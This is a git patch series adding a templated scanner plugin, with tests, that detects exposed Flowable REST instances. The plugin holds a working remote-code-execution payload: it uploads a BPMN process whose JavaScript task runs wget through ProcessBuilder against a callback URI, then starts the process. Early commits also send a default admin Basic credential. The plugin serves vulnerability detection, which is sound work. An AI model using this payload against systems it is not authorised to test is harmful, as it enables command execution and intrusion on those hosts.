From 52c71450cfceb43dfea8d1e0982386c4d71e6872 Mon Sep 17 00:00:00 2001
From: devampkid <devampkid@gmail.com>
Date: Wed, 13 Aug 2025 04:49:36 +0400
Subject: [PATCH 1/4] Flowable exposed UI It seems that test cases has a bug
 and i can't finish one test case after numerous efforts

---
 .../exposedui/Flowable_ExposedUI.textproto    | 117 ++++++++++++++++++
 .../Flowable_ExposedUI_test.textproto         |  89 +++++++++++++
 2 files changed, 206 insertions(+)
 create mode 100644 templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
 create mode 100644 templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto

diff --git a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
new file mode 100644
index 000000000..14f8be0be
--- /dev/null
+++ b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
@@ -0,0 +1,117 @@
+# proto-file: proto/templated_plugin.proto
+# proto-message: TemplatedPlugin
+
+###############
+# PLUGIN INFO #
+###############
+
+info: {
+  type: VULN_DETECTION
+  name: "Flowable_ExposedUI"
+  author: "lanceD00M"
+  version: "0.1"
+}
+
+finding: {
+  main_id: {
+    publisher: "GOOGLE"
+    value: "KESTRA_EXPOSED_UI"
+  }
+  title: "Exposed Kestra instance"
+  description: "Kestra instance is exposed and can be used to compromise the system."
+  recommendation:
+    "Configure authentication or ensure the Kestra instance is not exposed "
+    "to the network. See "
+    "https://kestra.io/docs/enterprise/auth/authentication for details."
+  severity: CRITICAL
+}
+
+###########
+# ACTIONS #
+###########
+
+actions: {
+  name: "flowable_exposed_ui_fingerprint"
+  http_request: {
+    method: GET
+    uri: "/flowable-rest/docs/"
+    headers: [
+      { name: "Authorization" value: "Basic cmVzdC1hZG1pbjp0ZXN0" }
+    ]
+    response: {
+      http_status: 200
+      expect_all: {
+        conditions: { body {} contains: 'case "specfile/process/flowable-swagger-process.json":' }
+        conditions: { body {} contains: 'case "specfile/dmn/flowable-swagger-decision.json":' }
+      }
+    }
+  }
+}
+
+actions: {
+  name: "deploy_tsunami_process"
+  http_request: {
+    method: POST
+    uri: "/flowable-rest/service/repository/deployments"
+    headers: [
+      { name: "Authorization" value: "Basic cmVzdC1hZG1pbjp0ZXN0" },
+      { name: "Content-Type" value: "multipart/form-data; boundary=------------------------gxyhRpqEx2dfbXUDrMqEEL" }
+    ]
+    data: '--------------------------gxyhRpqEx2dfbXUDrMqEEL\r\nContent-Disposition: form-data; name="file"; filename="jsScript.bpmn"\r\nContent-Type: application/octet-stream\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"\nxmlns:flowable="http://flowable.org/bpmn"\ntargetNamespace="Examples">\n\n<process id="jsScriptProcess" name="JavaScript Script Process">\n<startEvent id="start" />\n<sequenceFlow sourceRef="start" targetRef="scriptTask" />\n<scriptTask id="scriptTask" name="Execute Command via JavaScript"\nscriptFormat="javascript"\nflowable:autoStoreVariables="true">\n<script>\nvar ProcessBuilder = Java.type(\'java.lang.ProcessBuilder\');\nvar Arrays = Java.type(\'java.util.Arrays\');\nvar Scanner = Java.type(\'java.util.Scanner\');\n\nvar processBuilder = new ProcessBuilder(Arrays.asList(\'wget\', \'{{ T_CBS_URI }}\'));\nvar process = processBuilder.start();\n\nvar scanner = new Scanner(process.getInputStream()).useDelimiter("\\A");\nvar result = scanner.hasNext() ? scanner.next() : "";\n\nexecution.setVariable(\'commandOutput\', result);\n</script>\n</scriptTask>\n<sequenceFlow sourceRef="scriptTask" targetRef="end" />\n<endEvent id="end" />\n</process>\n\n</definitions>\n\r\n--------------------------gxyhRpqEx2dfbXUDrMqEEL--\r\n'
+    response: {
+      http_status: 201
+      expect_all: {
+        conditions: { body {} contains: '"id"' }
+        conditions: { body {} contains: '"name"' }
+        conditions: { body {} contains: '"deploymentTime"' }
+      }
+    }
+  }
+}
+
+actions: {
+  name: "execute_tsunami_process"
+  http_request: {
+    method: POST
+    uri: "/flowable-rest/service/runtime/process-instances"
+    data: '{"processDefinitionKey": "jsScriptProcess"}'
+    headers: [
+      { name: "Authorization" value: "Basic cmVzdC1hZG1pbjp0ZXN0" },
+      { name: "Content-Type" value: "application/json" }
+    ]
+    response: {
+      http_status: 201
+      expect_all: {
+        conditions: { body {} contains: '"id"' }
+        conditions: { body {} contains: '"processDefinitionId"' }
+        conditions: { body {} contains: '"processDefinitionDescription"' }
+        conditions: { body {} contains: '"value"' }
+      }
+    }
+  }
+}
+
+actions: {
+  name: "sleep"
+  utility: { sleep: { duration_ms: 1000 } }
+}
+
+actions: {
+  name: "check_callback_server_logs"
+  callback_server: { action_type: CHECK }
+}
+
+
+#############
+# WORKFLOWS #
+#############
+
+workflows: {
+  actions: [
+    "flowable_exposed_ui_fingerprint",
+    "deploy_tsunami_process",
+    "execute_tsunami_process",
+    "sleep",
+    "check_callback_server_logs"
+  ]
+}
diff --git a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto
new file mode 100644
index 000000000..18160aa95
--- /dev/null
+++ b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto
@@ -0,0 +1,89 @@
+# proto-file: proto/templated_plugin_tests.proto
+# proto-message: TemplatedPluginTests
+
+config: {
+  tested_plugin: "Flowable_ExposedUI"
+}
+
+tests: {
+  name: "whenVulnerable_returnsVuln"
+  expect_vulnerability: true
+
+  mock_callback_server: {
+    enabled: true
+    has_interaction: true
+  }
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/flowable-rest/docs/"
+        status: 200
+        body_content:
+            'case "specfile/process/flowable-swagger-process.json":'
+              'case "specfile/dmn/flowable-swagger-decision.json":'
+      },
+      {
+        uri: "/flowable-rest/service/repository/deployments"
+        status: 200
+        body_content:
+          '--------------------------gxyhRpqEx2dfbXUDrMqEEL\r\nContent-Disposition: form-data; name="file"; filename="jsScript.bpmn"\r\nContent-Type: application/octet-stream\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"\nxmlns:flowable="http://flowable.org/bpmn"\ntargetNamespace="Examples">\n\n<process id="jsScriptProcess" name="JavaScript Script Process">\n<startEvent id="start" />\n<sequenceFlow sourceRef="start" targetRef="scriptTask" />\n<scriptTask id="scriptTask" name="Execute Command via JavaScript"\nscriptFormat="javascript"\nflowable:autoStoreVariables="true">\n<script>\nvar ProcessBuilder = Java.type(\'java.lang.ProcessBuilder\');\nvar Arrays = Java.type(\'java.util.Arrays\');\nvar Scanner = Java.type(\'java.util.Scanner\');\n\nvar processBuilder = new ProcessBuilder(Arrays.asList'
+      },
+      {
+        uri: "/flowable-rest/service/runtime/process-instances"
+        status: 200
+        body_content:
+            '{"processDefinitionKey": "jsScriptProcess"}'
+      }
+    ]
+  }
+}
+
+
+tests: {
+  name: "whenNotFlowable_returnsNoVuln"
+  expect_vulnerability: false
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri:  "/api/v1/main/usages/all"
+        status: 400
+        body_content: "..."
+      }
+    ]
+  }
+}
+
+tests: {
+  name: "whenNoCallback_returnsFalse"
+  expect_vulnerability: false
+
+  mock_callback_server: {
+    enabled: true
+    has_interaction: false
+  }
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/flowable-rest/docs/"
+        status: 200
+        body_content:
+            'case "specfile/process/flowable-swagger-process.json":'
+                'case "specfile/dmn/flowable-swagger-decision.json":'
+      },
+      {
+        uri: "/flowable-rest/service/repository/deployments"
+        status: 200
+        body_content:
+            '--------------------------gxyhRpqEx2dfbXUDrMqEEL\r\nContent-Disposition: form-data; name="file"; filename="jsScript.bpmn"\r\nContent-Type: application/octet-stream\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"\nxmlns:flowable="http://flowable.org/bpmn"\ntargetNamespace="Examples">\n\n<process id="jsScriptProcess" name="JavaScript Script Process">\n<startEvent id="start" />\n<sequenceFlow sourceRef="start" targetRef="scriptTask" />\n<scriptTask id="scriptTask" name="Execute Command via JavaScript"\nscriptFormat="javascript"\nflowable:autoStoreVariables="true">\n<script>\nvar ProcessBuilder = Java.type(\'java.lang.ProcessBuilder\');\nvar Arrays = Java.type(\'java.util.Arrays\');\nvar Scanner = Java.type(\'java.util.Scanner\');\n\nvar processBuilder = new ProcessBuilder(Arrays.asList'
+      },
+      {
+        uri: "/flowable-rest/service/runtime/process-instances"
+        status: 200
+        body_content:
+            '{"processDefinitionKey": "jsScriptProcess"}'
+      }
+    ]
+  }
+}
\ No newline at end of file

From debc54a5681f6cf42dbfd9f78a53482dff4a994d Mon Sep 17 00:00:00 2001
From: devampkid <devampkid@gmail.com>
Date: Wed, 13 Aug 2025 14:56:30 +0400
Subject: [PATCH 2/4] testcases work fine now, thanks to the @tooryx

---
 .../exposedui/Flowable_ExposedUI.textproto    |  8 ++---
 .../Flowable_ExposedUI_test.textproto         | 30 ++++++++++++-------
 2 files changed, 23 insertions(+), 15 deletions(-)

diff --git a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
index 14f8be0be..5fe34f619 100644
--- a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
+++ b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
@@ -35,9 +35,6 @@ actions: {
   http_request: {
     method: GET
     uri: "/flowable-rest/docs/"
-    headers: [
-      { name: "Authorization" value: "Basic cmVzdC1hZG1pbjp0ZXN0" }
-    ]
     response: {
       http_status: 200
       expect_all: {
@@ -54,7 +51,6 @@ actions: {
     method: POST
     uri: "/flowable-rest/service/repository/deployments"
     headers: [
-      { name: "Authorization" value: "Basic cmVzdC1hZG1pbjp0ZXN0" },
       { name: "Content-Type" value: "multipart/form-data; boundary=------------------------gxyhRpqEx2dfbXUDrMqEEL" }
     ]
     data: '--------------------------gxyhRpqEx2dfbXUDrMqEEL\r\nContent-Disposition: form-data; name="file"; filename="jsScript.bpmn"\r\nContent-Type: application/octet-stream\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"\nxmlns:flowable="http://flowable.org/bpmn"\ntargetNamespace="Examples">\n\n<process id="jsScriptProcess" name="JavaScript Script Process">\n<startEvent id="start" />\n<sequenceFlow sourceRef="start" targetRef="scriptTask" />\n<scriptTask id="scriptTask" name="Execute Command via JavaScript"\nscriptFormat="javascript"\nflowable:autoStoreVariables="true">\n<script>\nvar ProcessBuilder = Java.type(\'java.lang.ProcessBuilder\');\nvar Arrays = Java.type(\'java.util.Arrays\');\nvar Scanner = Java.type(\'java.util.Scanner\');\n\nvar processBuilder = new ProcessBuilder(Arrays.asList(\'wget\', \'{{ T_CBS_URI }}\'));\nvar process = processBuilder.start();\n\nvar scanner = new Scanner(process.getInputStream()).useDelimiter("\\A");\nvar result = scanner.hasNext() ? scanner.next() : "";\n\nexecution.setVariable(\'commandOutput\', result);\n</script>\n</scriptTask>\n<sequenceFlow sourceRef="scriptTask" targetRef="end" />\n<endEvent id="end" />\n</process>\n\n</definitions>\n\r\n--------------------------gxyhRpqEx2dfbXUDrMqEEL--\r\n'
@@ -76,7 +72,6 @@ actions: {
     uri: "/flowable-rest/service/runtime/process-instances"
     data: '{"processDefinitionKey": "jsScriptProcess"}'
     headers: [
-      { name: "Authorization" value: "Basic cmVzdC1hZG1pbjp0ZXN0" },
       { name: "Content-Type" value: "application/json" }
     ]
     response: {
@@ -105,6 +100,9 @@ actions: {
 #############
 # WORKFLOWS #
 #############
+config {
+  debug: true
+}
 
 workflows: {
   actions: [
diff --git a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto
index 18160aa95..2fef33f44 100644
--- a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto
+++ b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto
@@ -24,15 +24,20 @@ tests: {
       },
       {
         uri: "/flowable-rest/service/repository/deployments"
-        status: 200
-        body_content:
-          '--------------------------gxyhRpqEx2dfbXUDrMqEEL\r\nContent-Disposition: form-data; name="file"; filename="jsScript.bpmn"\r\nContent-Type: application/octet-stream\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"\nxmlns:flowable="http://flowable.org/bpmn"\ntargetNamespace="Examples">\n\n<process id="jsScriptProcess" name="JavaScript Script Process">\n<startEvent id="start" />\n<sequenceFlow sourceRef="start" targetRef="scriptTask" />\n<scriptTask id="scriptTask" name="Execute Command via JavaScript"\nscriptFormat="javascript"\nflowable:autoStoreVariables="true">\n<script>\nvar ProcessBuilder = Java.type(\'java.lang.ProcessBuilder\');\nvar Arrays = Java.type(\'java.util.Arrays\');\nvar Scanner = Java.type(\'java.util.Scanner\');\n\nvar processBuilder = new ProcessBuilder(Arrays.asList'
+        status: 201
+        body_content: '{"id":"15a2a09b-7833-11f0-be7c-d6c58d18e6b5","name":"jsScript","deploymentTime":"2025-08-13T10:48:45.013Z","category":null,"parentDeploymentId":"15a2a09b-7833-11f0-be7c-d6c58d18e6b5","url":"http://localhost:8081/flowable-rest/service/repository/deployments/15a2a09b-7833-11f0-be7c-d6c58d18e6b5","tenantId":""}'
+        condition: {
+          body_content: 'Content-Type: application/octet-stream\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"\nxmlns:flowable="http://flowable.org/bpmn"\ntargetNamespace="Examples">\n\n<process id="jsScriptProcess" name="JavaScript Script Process">\n<startEvent id="start" />\n<sequenceFlow sourceRef="start" targetRef="scriptTask" />\n<scriptTask id="scriptTask" name="Execute Command via JavaScript"\nscriptFormat="javascript"\nflowable:autoStoreVariables="true">\n<script>\nvar ProcessBuilder = Java.type(\'java.lang.ProcessBuilder\');\nvar Arrays = Java.type(\'java.util.Arrays\');\nvar Scanner = Java.type(\'java.util.Scanner\');\n\nvar processBuilder = new ProcessBuilder(Arrays.asList(\'wget\', \''
+        }
       },
       {
         uri: "/flowable-rest/service/runtime/process-instances"
-        status: 200
+        status: 201
         body_content:
-            '{"processDefinitionKey": "jsScriptProcess"}'
+            '{"id":"24aeb56e-7833-11f0-be7c-d6c58d18e6b5","url":"http://localhost:8081/flowable-rest/service/runtime/process-instances/24aeb56e-7833-11f0-be7c-d6c58d18e6b5","name":null,"businessKey":null,"businessStatus":null,"suspended":false,"ended":true,"processDefinitionId":"jsScriptProcess:2:15a4273d-7833-11f0-be7c-d6c58d18e6b5","processDefinitionUrl":"http://localhost:8081/flowable-rest/service/repository/process-definitions/jsScriptProcess:2:15a4273d-7833-11f0-be7c-d6c58d18e6b5","processDefinitionName":"JavaScript Script Process","processDefinitionDescription":null,"activityId":null,"startUserId":"rest-admin","startTime":"2025-08-13T10:49:10.258Z","superProcessInstanceId":null,"variables":[{"name":"commandOutput","type":"string","value":"Linux 32b589dc11ac 6.14.0-27-generic #27~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Jul 22 17:38:49 UTC 2 x86_64 Linux\n","scope":"local"}],"callbackId":null,"callbackType":null,"referenceId":null,"referenceType":null,"propagatedStageInstanceId":null,"tenantId":"","completed":true}'
+        condition: {
+          body_content: '{"processDefinitionKey": "jsScriptProcess"}'
+        }
       }
     ]
   }
@@ -74,15 +79,20 @@ tests: {
       },
       {
         uri: "/flowable-rest/service/repository/deployments"
-        status: 200
-        body_content:
-            '--------------------------gxyhRpqEx2dfbXUDrMqEEL\r\nContent-Disposition: form-data; name="file"; filename="jsScript.bpmn"\r\nContent-Type: application/octet-stream\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"\nxmlns:flowable="http://flowable.org/bpmn"\ntargetNamespace="Examples">\n\n<process id="jsScriptProcess" name="JavaScript Script Process">\n<startEvent id="start" />\n<sequenceFlow sourceRef="start" targetRef="scriptTask" />\n<scriptTask id="scriptTask" name="Execute Command via JavaScript"\nscriptFormat="javascript"\nflowable:autoStoreVariables="true">\n<script>\nvar ProcessBuilder = Java.type(\'java.lang.ProcessBuilder\');\nvar Arrays = Java.type(\'java.util.Arrays\');\nvar Scanner = Java.type(\'java.util.Scanner\');\n\nvar processBuilder = new ProcessBuilder(Arrays.asList'
+        status: 201
+        body_content: '{"id":"15a2a09b-7833-11f0-be7c-d6c58d18e6b5","name":"jsScript","deploymentTime":"2025-08-13T10:48:45.013Z","category":null,"parentDeploymentId":"15a2a09b-7833-11f0-be7c-d6c58d18e6b5","url":"http://localhost:8081/flowable-rest/service/repository/deployments/15a2a09b-7833-11f0-be7c-d6c58d18e6b5","tenantId":""}'
+        condition: {
+          body_content: 'Content-Type: application/octet-stream\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"\nxmlns:flowable="http://flowable.org/bpmn"\ntargetNamespace="Examples">\n\n<process id="jsScriptProcess" name="JavaScript Script Process">\n<startEvent id="start" />\n<sequenceFlow sourceRef="start" targetRef="scriptTask" />\n<scriptTask id="scriptTask" name="Execute Command via JavaScript"\nscriptFormat="javascript"\nflowable:autoStoreVariables="true">\n<script>\nvar ProcessBuilder = Java.type(\'java.lang.ProcessBuilder\');\nvar Arrays = Java.type(\'java.util.Arrays\');\nvar Scanner = Java.type(\'java.util.Scanner\');\n\nvar processBuilder = new ProcessBuilder(Arrays.asList(\'wget\', \''
+        }
       },
       {
         uri: "/flowable-rest/service/runtime/process-instances"
-        status: 200
+        status: 201
         body_content:
-            '{"processDefinitionKey": "jsScriptProcess"}'
+            '{"id":"24aeb56e-7833-11f0-be7c-d6c58d18e6b5","url":"http://localhost:8081/flowable-rest/service/runtime/process-instances/24aeb56e-7833-11f0-be7c-d6c58d18e6b5","name":null,"businessKey":null,"businessStatus":null,"suspended":false,"ended":true,"processDefinitionId":"jsScriptProcess:2:15a4273d-7833-11f0-be7c-d6c58d18e6b5","processDefinitionUrl":"http://localhost:8081/flowable-rest/service/repository/process-definitions/jsScriptProcess:2:15a4273d-7833-11f0-be7c-d6c58d18e6b5","processDefinitionName":"JavaScript Script Process","processDefinitionDescription":null,"activityId":null,"startUserId":"rest-admin","startTime":"2025-08-13T10:49:10.258Z","superProcessInstanceId":null,"variables":[{"name":"commandOutput","type":"string","value":"Linux 32b589dc11ac 6.14.0-27-generic #27~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Jul 22 17:38:49 UTC 2 x86_64 Linux\n","scope":"local"}],"callbackId":null,"callbackType":null,"referenceId":null,"referenceType":null,"propagatedStageInstanceId":null,"tenantId":"","completed":true}'
+        condition: {
+          body_content: '{"processDefinitionKey": "jsScriptProcess"}'
+        }
       }
     ]
   }

From d2b966af3af4e4a76f9da3bda97a56a2b8108ba4 Mon Sep 17 00:00:00 2001
From: devampkid <devampkid@gmail.com>
Date: Wed, 13 Aug 2025 22:17:45 +0400
Subject: [PATCH 3/4] update finding section

---
 .../plugins/exposedui/Flowable_ExposedUI.textproto     | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
index 5fe34f619..dfdd81b8e 100644
--- a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
+++ b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
@@ -15,14 +15,14 @@ info: {
 finding: {
   main_id: {
     publisher: "GOOGLE"
-    value: "KESTRA_EXPOSED_UI"
+    value: "FLOWABLE_EXPOSED_UI"
   }
-  title: "Exposed Kestra instance"
-  description: "Kestra instance is exposed and can be used to compromise the system."
+  title: "Exposed Flowable instance"
+  description: "Flowable instance is exposed and can be used to compromise the system."
   recommendation:
-    "Configure authentication or ensure the Kestra instance is not exposed "
+    "Configure authentication or ensure the Flowable instance is not exposed "
     "to the network. See "
-    "https://kestra.io/docs/enterprise/auth/authentication for details."
+    "https://www.flowable.com/open-source/docs/header-rest/#installation-and-authentication."
   severity: CRITICAL
 }
 

From 036a35086b16e3fa7c96726841484351f3895427 Mon Sep 17 00:00:00 2001
From: devampkid <devampkid@gmail.com>
Date: Fri, 3 Oct 2025 22:50:53 +0400
Subject: [PATCH 4/4] cleanup action to have a clean test

---
 .../exposedui/Flowable_ExposedUI.textproto    | 22 ++++++++++++++++---
 .../Flowable_ExposedUI_test.textproto         |  8 +++++++
 2 files changed, 27 insertions(+), 3 deletions(-)

diff --git a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
index dfdd81b8e..29777ba6b 100644
--- a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
+++ b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto
@@ -61,6 +61,15 @@ actions: {
         conditions: { body {} contains: '"name"' }
         conditions: { body {} contains: '"deploymentTime"' }
       }
+      extract_all: {
+        patterns: [
+          {
+            from_body: {}
+            regexp: "\"id\":\"([a-f0-9-]+)\""
+            variable_name: "deploymentid"
+          }
+        ]
+      }
     }
   }
 }
@@ -84,6 +93,15 @@ actions: {
       }
     }
   }
+  cleanup_actions:["cleanup_tsunami_process"]
+}
+
+actions: {
+  name: "cleanup_tsunami_process"
+  http_request: {
+    method: DELETE
+    uri: "/flowable-rest/service/repository/deployments/{{ deploymentid }}"
+  }
 }
 
 actions: {
@@ -100,9 +118,7 @@ actions: {
 #############
 # WORKFLOWS #
 #############
-config {
-  debug: true
-}
+config { }
 
 workflows: {
   actions: [
diff --git a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto
index 2fef33f44..71236da3f 100644
--- a/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto
+++ b/templated/templateddetector/plugins/exposedui/Flowable_ExposedUI_test.textproto
@@ -38,6 +38,10 @@ tests: {
         condition: {
           body_content: '{"processDefinitionKey": "jsScriptProcess"}'
         }
+      },
+      {
+        uri: "/flowable-rest/service/repository/deployments/15a2a09b-7833-11f0-be7c-d6c58d18e6b5"
+        status: 201
       }
     ]
   }
@@ -93,6 +97,10 @@ tests: {
         condition: {
           body_content: '{"processDefinitionKey": "jsScriptProcess"}'
         }
+      },
+      {
+        uri: "/flowable-rest/service/repository/deployments/15a2a09b-7833-11f0-be7c-d6c58d18e6b5"
+        status: 201
       }
     ]
   }